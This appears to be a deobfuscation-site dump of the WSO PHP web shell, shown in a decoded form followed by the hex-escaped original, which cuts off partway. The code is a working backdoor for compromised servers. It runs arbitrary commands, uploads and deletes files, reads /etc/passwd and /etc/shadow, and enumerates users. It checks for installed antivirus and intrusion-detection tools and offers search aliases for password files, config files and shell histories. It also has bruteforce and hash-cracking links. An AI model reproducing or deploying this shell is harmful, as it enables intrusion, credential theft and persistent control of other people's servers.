$temp[] = "Oracle"; } goto DQ0Hi; I0L0t: if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysqli_get_client_info() . ")"; } goto T3sY7; T3sY7: if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } goto oKr71; Kcf2h: echo "<h1>Server security information</h1><div class=content>"; goto deosI; GSa9X: echo "<br>"; goto Ppg7_; zA3JJ: wsoSecParam("Server software", @getenv("SERVER_SOFTWARE")); goto aO8HS; IbU7m: echo "</div>"; goto XTIFZ; XTIFZ: wsoFooter(); goto jAziO; V6Pow: wsoSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); goto qT_UQ; zEzgM: $temp = array(); goto I0L0t; DQ0Hi: wsoSecParam("Supported databases", implode(", ", $temp)); goto GSa9X; Ppg7_: if ($GLOBALS["os"] == "nix") { goto yzksH; Pr2du: if (!$GLOBALS["safe_mode"]) { goto tBdFD; b1GnC: wsoSecParam("Userful", implode(", ", $temp)); goto gsw3Q; IArV4: $temp = array(); goto bo6ds; SphFn: wsoSecParam("Hosts", @file_get_contents("/etc/hosts")); goto dOgcI; bo6ds: foreach ($userful as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto b1GnC; VXdNV: wsoSecParam("Danger", implode(", ", $temp)); goto xDJbP; tBdFD: $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); goto j1mm2; zL0U4: foreach ($danger as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto VXdNV; F15O4: echo "<br/>"; goto vzm5g; gsw3Q: $temp = array(); goto zL0U4; AYbzB: wsoSecParam("Downloaders", implode(", ", $temp)); goto F15O4; M0R0C: $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); goto nuthD; dOgcI: echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>"; goto Fh4yv; Fh4yv: if (isset($_POST["p2"], $_POST["p3"]) && is_numeric($_POST["p2"]) && is_numeric($_POST["p3"])) { goto TMVUA; Aagop: wsoSecParam("Users", $temp); goto H4g4C; TMVUA: $temp = ''; goto g4wsK; yuLqo: echo "<br/>"; goto Aagop; g4wsK: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { $temp .= join(":", $uid) . "
"; } } goto yuLqo; H4g4C: } goto GP22b; vzm5g: wsoSecParam("HDD space", wsoEx("df -h")); goto SphFn; j1mm2: $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); goto M0R0C; xDJbP: $temp = array(); goto pSd_M; pSd_M: foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto AYbzB; nuthD: echo "<br>"; goto IArV4; GP22b: } goto QDcOt; yzksH: wsoSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); goto ledym; ESH98: wsoSecParam("OS version", @file_get_contents("/proc/version")); goto ZLZ7x; ZLZ7x: wsoSecParam("Distr name", @file_get_contents("/etc/issue.net")); goto Pr2du; ledym: wsoSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); goto ESH98; QDcOt: } else { goto NsBCo; Me9Q1: wsoSecParam("Account Settings", wsoEx("net accounts")); goto RXCoL; NsBCo: wsoSecParam("OS Version", wsoEx("ver")); goto Me9Q1; RXCoL: wsoSecParam("User Accounts", wsoEx("net user")); goto DnuxL; DnuxL: } goto IbU7m; wqp98: wsoHeader(); goto Kcf2h; aO8HS: if (function_exists("apache_get_modules")) { wsoSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } goto m3Zin; deosI: function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "
") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } goto zA3JJ; jAziO: } goto oHsYW; qljle: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto j4eIF; g7ZCc: @ini_set("log_errors", 0); goto ABTpd; XeOpc: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto lUvYe; KC9ar: function actionStringTools() { goto MBvsT; S0req: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto nYBgB; Oymko: if (!function_exists("hex2ascii")) { function hex2ascii($p) { goto uM0Pu; NG1dD: return $r; goto fKGDN; uM0Pu: $r = ''; goto ac1Yo; ac1Yo: for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } goto NG1dD; fKGDN: } } goto ZMcUd; vUNKP: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; goto k5nqW; ZMcUd: if (!function_exists("ascii2hex")) { function ascii2hex($p) { goto cdb2T; O0tgA: for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } goto JVXpM; cdb2T: $r = ''; goto O0tgA; JVXpM: return strtoupper($r); goto I6jbu; I6jbu: } } goto q2kmv; HYxD9: echo "<h1>String conversions</h1><div class=content>"; goto OX44o; awjDW: function wsoRecursiveGlob($path) { goto TkAHe; lEFZ5: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { wsoRecursiveGlob($item); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($item), $_POST["p2"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($item) . "", "view","")'>" . htmlspecialchars($item) . "</a><br>"; } } } } goto fVCol; GUM3F: $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); goto lEFZ5; TkAHe: if (substr($path, -1) != "/") { $path .= "/"; } goto GUM3F; fVCol: } goto qLbIZ; aUced: if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } goto Oymko; MBvsT: if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } goto aUced; q2kmv: if (!function_exists("full_urlencode")) { function full_urlencode($p) { goto d1_DN; d1_DN: $r = ''; goto D3iJl; YAXHC: return strtoupper($r); goto wfgBE; D3iJl: for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } goto YAXHC; wfgBE: } } goto IHtdM; N3xOi: if (isset($_POST["ajax"])) { goto V2x0a; Wm5Kx: exit; goto IafqZ; x5Jd7: if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } goto vD3zd; vD3zd: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd\x9\'\x0") . "';\xa"; goto NED_K; V2x0a: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto LTDt0; LTDt0: ob_start(); goto x5Jd7; NED_K: echo strlen($temp), "
", $temp; goto Wm5Kx; IafqZ: } goto S0req; nYBgB: wsoHeader(); goto HYxD9; k5nqW: if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } goto jZzWZ; OX44o: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto BBAR5; Rfc53: wsoFooter(); goto JMM51; uWngZ: echo "</div><br><h1>Search for hash:</h1><div class=content>\xd\xa	\x9<form method='post' target='_blank' name='hf'>
\xa	\x9\x9<input type='text' name='hash' style='width:200px;'><br>\xd
            <input type='hidden' name='act' value='find'/>
\x9		<input type='button' value='hashcracking.ru' onclick="document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
	\x9	<input type='button' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
\xa            <input type='button' value='crackfor.me' onclick="document.hf.action='http://crackfor.me/index.php';document.hf.submit()"><br>
\x9	</form></div>"; goto Rfc53; BBAR5: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } goto vUNKP; qLbIZ: if (@$_POST["p3"]) { wsoRecursiveGlob($_POST["c"]); } goto uWngZ; jZzWZ: echo "</pre></div><br><h1>Search files:</h1><div class=content>\xd
\x9	<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xd
		\x9<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xd\xa\x9\x9	<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>\xd\xa			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
\xa\x9		<tr><td></td><td><input type='submit' value='>>'></td></tr>\xd\xa	\x9	</table></form>"; goto awjDW; IHtdM: $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); goto N3xOi; JMM51: } goto xB4MH; sO9OV: $cwd = @getcwd(); goto cUzsD; SG2I5: function WSOstripslashes($array) { return is_array($array) ? array_map("WSOstripslashes", $array) : stripslashes($array); } goto M9YJl; EoPoZ: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto MrsTM; Cjo7J: $color = "#df5"; goto LNmAT; ocXfq: $_COOKIE = WSOstripslashes($_COOKIE); goto Qn_9k; dPSqc: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("action" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "SecInfo"; } } goto j2Rfu; fj9OS: if ($argc == 3) { $_POST = unserialize(base64_decode($argv[1])); $_SERVER = unserialize(base64_decode($argv[2])); } goto GFRHq; MrsTM: function wsoHeader() { goto E9rcc; FKql5: echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="" . $explink . "" target=_blank>[exploit-db.com]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=red>ON</font>" : "<font color=green><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . wsoViewSize($totalSpace) . " <span>Free:</span> " . wsoViewSize($freeSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)<br>" . $cwd_links . " " . wsoPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" . $opt_charsets . "</optgroup></select><br><span>Server IP:</span><br>" . @$_SERVER["SERVER_ADDR"] . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div style="margin:5">"; goto RzURU; M4wyI: $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Sql" => "Sql", "Php" => "Php", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); goto JIPap; XR0lk: $totalSpace = $totalSpace ? $totalSpace : 1; goto gDdS4; QoI2U: $drives = ''; goto dJUUJ; E9rcc: if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } goto wwJNm; yWMQp: $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); goto QAzn_; JIPap: if (!empty($GLOBALS["auth_pass"])) { $m["Logout"] = "Logout"; } goto hedz2; nmRB7: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO_VERSION . "</title>\xd
<style>
\xabody{background-color:#444;color:#e1e1e1;}
\xabody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\xd\xatable.info{ color:#fff;background-color:#222; }
\xaspan,h1,a{ color: {$color} !important; }\xd
span{ font-weight: bolder; }\xd
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\xd
div.content{ padding: 5px;margin-left:5px;background-color:#333; }\xd\xaa{ text-decoration:none; }\xd\xaa:hover{ text-decoration:underline; }
\xa.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }\xd\xainput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\xd
form{ margin:0px; }
\xa#toolsTbl{ text-align:center; }
\xa.toolsInp{ width: 300px }
\xa.main th{text-align:left;background-color:#5e5e5e;}\xd\xa.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
\xa.l2{background-color:#333}\xd
pre{font-family:Courier,Monospace;}
</style>
\xa<script>
\xa    var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';\xd\xa    var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'\xd
    var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';\xd
    var p1_ = '" . (strpos(@$_POST["p1"], "
") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';
    var p2_ = '" . (strpos(@$_POST["p2"], "
") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';\xd\xa    var p3_ = '" . (strpos(@$_POST["p3"], "\xa") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';
    var d = document;\xd\xa\x9function set(a,c,p1,p2,p3,charset) {
\xa	\x9if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xd\xa		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
\xa	\x9if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\xd
	\x9if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
\xa\x9\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\xd
	}\xd\xa\x9function g(a,c,p1,p2,p3,charset) {
\x9	set(a,c,p1,p2,p3,charset);\xd\xa\x9	d.mf.submit();\xd
\x9}\xd
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);\xd\xa	\x9var params = 'ajax=true';\xd\xa\x9\x9for(i=0;i<d.mf.elements.length;i++)
\xa\x9	\x9params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xd
\x9\x9sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
\xa\x9}\xd
\x9function sr(url, params) {\xd
	\x9if (window.XMLHttpRequest)
\xa	\x9	req = new XMLHttpRequest();\xd
\x9\x9else if (window.ActiveXObject)\xd\xa\x9\x9	req = new ActiveXObject('Microsoft.XMLHTTP');\xd
        if (req) {\xd
            req.onreadystatechange = processReqChange;\xd\xa            req.open('POST', url, true);
\xa            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xd\xa            req.send(params);\xd
        }
\xa	}
\xa\x9function processReqChange() {
		if( (req.readyState == 4) )
\xa	\x9\x9if(req.status == 200) {\xd
		\x9\x9var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xd
				var arr=reg.exec(req.responseText);\xd
		\x9	eval(arr[2].substr(0, arr[1]));\xd\xa\x9\x9\x9} else alert('Request error!');
\xa\x9}
</script>
\xa<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xd
<input type=hidden name=a>\xd
<input type=hidden name=c>\xd
<input type=hidden name=p1>
\xa<input type=hidden name=p2>\xd
<input type=hidden name=p3>
\xa<input type=hidden name=charset>\xd
</form>"; goto yrJci; HJ09z: $totalSpace = @disk_total_space($GLOBALS["cwd"]); goto XR0lk; mxXoN: $explink = "http://exploit-db.com/search/?action=search&filter_description="; goto CGFSE; jqLRT: $menu = ''; goto pyClH; znu8e: $kernel = @php_uname("s"); goto mxXoN; IUSK1: for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } goto yWMQp; QAzn_: $opt_charsets = ''; goto wJ6Eu; hedz2: $m["Self remove"] = "SelfRemove"; goto jqLRT; MFEdT: $n = count($path); goto IUSK1; PbU2y: $path = explode("/", $GLOBALS["cwd"]); goto MFEdT; CGFSE: if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } goto oXY47; yrJci: $freeSpace = @diskfreespace($GLOBALS["cwd"]); goto HJ09z; pyClH: foreach ($m as $k => $v) { $menu .= "<th width="" . (int) (100 / count($m)) . "%">[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } goto QoI2U; wJ6Eu: foreach ($charsets as $item) { $opt_charsets .= "<option value="" . $item . "" " . ($_POST["charset"] == $item ? "selected" : '') . ">" . $item . "</option>"; } goto M4wyI; dJUUJ: if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } goto FKql5; wwJNm: global $color; goto nmRB7; gDdS4: $release = @php_uname("r"); goto znu8e; oXY47: if (!function_exists("posix_getegid")) { goto VMtJd; VMtJd: $user = @get_current_user(); goto RNehq; RNehq: $uid = @getmyuid(); goto kWs3Y; n3X6Y: $group = "?"; goto dyMHz; kWs3Y: $gid = @getmygid(); goto n3X6Y; dyMHz: } else { goto ec83q; yJq0B: $uid = $uid["uid"]; goto nZ1Iw; nZ1Iw: $group = $gid["name"]; goto LgEQ1; LgEQ1: $gid = $gid["gid"]; goto XEe3x; q9aTZ: $user = $uid["name"]; goto yJq0B; ERGtZ: $gid = @posix_getgrgid(posix_getegid()); goto q9aTZ; ec83q: $uid = @posix_getpwuid(posix_geteuid()); goto ERGtZ; XEe3x: } goto HU3s7; HU3s7: $cwd_links = ''; goto PbU2y; RzURU: } goto pXSrD; lUvYe: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto d62j5; V8rDW: @set_time_limit(0); goto hd5Oa; KCE0z: function wsoWhich($p) { goto qE7x8; bvBsL: if (!empty($path)) { return $path; } goto A0ITv; qE7x8: $path = wsoEx("which " . $p); goto bvBsL; A0ITv: return false; goto xhdvj; xhdvj: } goto HhMRL; guAyk: function wsoScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto AwLVq; hfmSV: while (false !== ($filename = readdir($dh))) { $files[] = $filename; } goto Rc9At; Rc9At: return $files; goto dO6EV; AwLVq: $dh = opendir($dir); goto hfmSV; dO6EV: } } goto KCE0z; pXSrD: function wsoFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\xd\xa</div>\xd
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>\xd\xa\x9<tr>
\x9\x9<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='>>'></form></td>
\xa	\x9<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xd
	</tr><tr>
\xa\x9	<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
\xa\x9</tr><tr>\xd\xa		<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
\xa		<td><form method='post' ENCTYPE='multipart/form-data'>
\xa\x9\x9<input type=hidden name=a value='FilesMAn'>
\x9	<input type=hidden name=c value='" . $GLOBALS["cwd"] . "'>\xd
\x9	<input type=hidden name=p1 value='uploadFile'>\xd
\x9\x9<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
\x9\x9<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
\x9</tr></table></div></body></html>"; } goto XeOpc; Qn_9k: function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto e2q7d; i6mTz: function actionSelfRemove() { goto KQZY3; trHKc: if ($_POST["p1"] != "yes") { wsoHeader(); } goto X7soZ; X7soZ: echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; goto tsvXj; KQZY3: if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } goto trHKc; tsvXj: wsoFooter(); goto n3JxC; n3JxC: } goto DbGtY; TQr3j: if (!empty($auth_pass)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $auth_pass) { wsoLogin(); } } goto tZUOM; e2q7d: function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto TQr3j; yXkOt: function wsoViewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto etiAC; Zxful: exit; 
 
 
 ?>

Did this file decode correctly?

Original Code

<?php
 goto Cjo7J; LqaMO: $safe_mode = @ini_get("\x73\x61\x66\x65\137\155\157\x64\145"); goto zGahs; zGahs: if (!$safe_mode) { error_reporting(0); } goto Gop14; j2Rfu: if (!empty($_POST["\141"]) && function_exists("\x61\x63\164\151\157\156" . $_POST["\x61"])) { call_user_func("\141\x63\x74\x69\157\x6e" . $_POST["\141"]); } goto Zxful; GFRHq: @ini_set("\x65\x72\x72\157\162\137\154\157\x67", NULL); goto g7ZCc; N84uU: function actionFilesMan() { goto J7jRR; la8rp: if (class_exists("\132\x69\160\101\x72\x63\150\151\x76\145")) { echo "\x3c\x6f\x70\164\x69\157\x6e\x20\166\x61\x6c\x75\x65\x3d\x27\x7a\x69\160\47\76\103\x6f\x6d\160\162\145\x73\x73\40\50\172\x69\x70\51\74\x2f\157\160\x74\151\x6f\x6e\76\x3c\157\160\x74\x69\x6f\x6e\40\166\141\154\x75\x65\75\x27\x75\156\172\x69\160\47\76\125\156\143\x6f\155\160\162\145\x73\163\x20\x28\172\x69\160\x29\74\x2f\x6f\160\164\151\x6f\156\76"; } goto GTtN3; uO4Od: if (!empty($_POST["\x70\61"])) { switch ($_POST["\x70\61"]) { case "\x75\x70\154\x6f\141\144\106\x69\154\145": if (!@move_uploaded_file($_FILES["\x66"]["\164\155\160\137\x6e\141\x6d\145"], $_FILES["\146"]["\156\x61\155\x65"])) { echo "\103\141\x6e\47\164\40\x75\x70\x6c\x6f\141\144\x20\146\x69\x6c\x65\41"; } break; case "\155\x6b\144\x69\162": if (!@mkdir($_POST["\x70\62"])) { echo "\103\141\156\47\x74\40\x63\162\145\x61\164\145\40\x6e\x65\167\40\x64\151\162"; } break; case "\x64\x65\154\145\164\x65": goto zgV_d; mm32x: break; goto hEfbk; zgV_d: function deleteDir($path) { goto RrCM3; zxeby: $dh = opendir($path); goto TCJ3G; TCJ3G: while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == "\56\x2e" || basename($item) == "\56") { continue; } $type = filetype($item); if ($type == "\144\x69\162") { deleteDir($item); } else { @unlink($item); } } goto qhDI4; SLRoZ: @rmdir($path); goto ld2N6; RrCM3: $path = substr($path, -1) == "\x2f" ? $path : $path . "\57"; goto zxeby; qhDI4: closedir($dh); goto SLRoZ; ld2N6: } goto Jstso; Jstso: if (is_array(@$_POST["\146"])) { foreach ($_POST["\146"] as $f) { goto Fce39; jTf8C: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto sVDIO; Fce39: if ($f == "\56\x2e") { continue; } goto NavX2; NavX2: $f = urldecode($f); goto jTf8C; sVDIO: } } goto mm32x; hEfbk: case "\160\141\x73\x74\145": goto aIzMf; aIzMf: if ($_COOKIE["\141\x63\x74"] == "\x63\x6f\x70\x79") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto DXZu5; OpM7_: $h = 